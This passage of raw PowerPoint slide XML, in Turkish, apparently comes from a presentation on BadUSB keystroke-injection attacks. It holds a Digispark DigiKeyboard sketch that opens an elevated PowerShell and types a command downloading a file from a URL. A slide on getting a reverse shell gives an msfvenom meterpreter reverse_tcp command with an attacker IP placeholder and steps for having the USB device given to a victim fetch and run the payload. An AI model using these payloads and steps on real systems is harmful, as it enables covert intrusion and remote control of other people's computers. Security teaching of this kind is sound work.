              <a:t>çalıştırmak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>DigiKeyboard.delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>(2000);</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>DigiKeyboard.sendKeyStroke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>(KEY_LEFT_ARROW); // sol ok </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>tuşuna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> bas.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>DigiKeyboard.delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>(2000);</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>DigiKeyboard.sendKeyStroke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>(KEY_ENTER); //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>Enter’a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> bas.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>DigiKeyboard.delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>(2000); </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>DigiKeyboard.print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>("$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>indirilecek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>dosyanın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>gir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>. '; $output = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>hedef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>yolu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>belirt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>'; $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>start_time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> = Get-Date; </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>wc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>wc.DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>, $output); </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Write-Output 'Time taken: $((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>GetDate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>).Subtract($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>start_time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>).Seconds) second(s)';");</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>DigiKeyboard.sendKeyStroke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>(KEY_ENTER); //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>Enter’a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> bas.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62703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B1F8B12-9FE7-43C8-BF60-0BB453DD013E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Hedef sistem üzerinde ters kabuk (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>) alma yöntemi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E0CDEA3-D4BA-40D7-BCCB-F57AFE5D3AF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913795" y="2096064"/>
            <a:ext cx="5249938" cy="4253936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Yerel ağda mevcut olan bilgisayardan belirlenen port dinlemeye alınarak hedef bilgisayarın bize bağlantı kurması sağlanır. Saldırı için izlenmesi gereken yol ve kurulabilecek strateji aşağıdaki gibidir;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>-	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> kullanılarak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>revershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> için bir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> oluşturulur. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>payload’un</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> uzantısı yerine .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> uzantılı olmasına dikkat edilir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>smallest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> LHOST= “saldırgan ip”   LPORT=444 -o /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/Desktop/payload.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>-	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Oluşturulan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> yerelde ağda bulunan bir sunucuya yada internette bir sunucuya yüklenir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>-	Kurbana verilecek </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Badusb’nin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> içerisine yazılacak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>payload’ı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> internetten indirerek çalıştırmalıdır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>-	Bu esnada hazırlanan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>payload’u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> hedef sistem takıp çalıştırmadan önce kendi sisteminde uygun port seçilip dinlemeye alınır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Metin kutusu 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DE87676-4153-4C48-B1C7-202F3ACF3BE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382000" y="2345267"/>
            <a:ext cx="3251200" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>#include "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>void setup() {</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>void loop() {</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.sendKeyStroke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(0);</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.sendKeyStroke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(KEY_R, MOD_GUI_LEFT); // Windows + R </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>kombinasyonunun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>tuşla</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(2000);  // 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>saniye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>bekle</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>"); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>Açılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>Çalıştır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>penceresine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>yaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(2000);  // 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>saniye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>bekle</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.sendKeyStroke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(KEY_ENTER,MOD_CONTROL_LEFT|MOD_SHIFT_LEFT); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>powershell’i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>yönetici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>çalıştırmak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>için</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(2000);</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.sendKeyStroke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(KEY_LEFT_ARROW); // sol ok </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>tuşuna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> bas.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(2000);</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.sendKeyStroke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(KEY_ENTER); //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>Enter’a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> bas.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.delay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(2000); </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>DigiKeyboard.print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
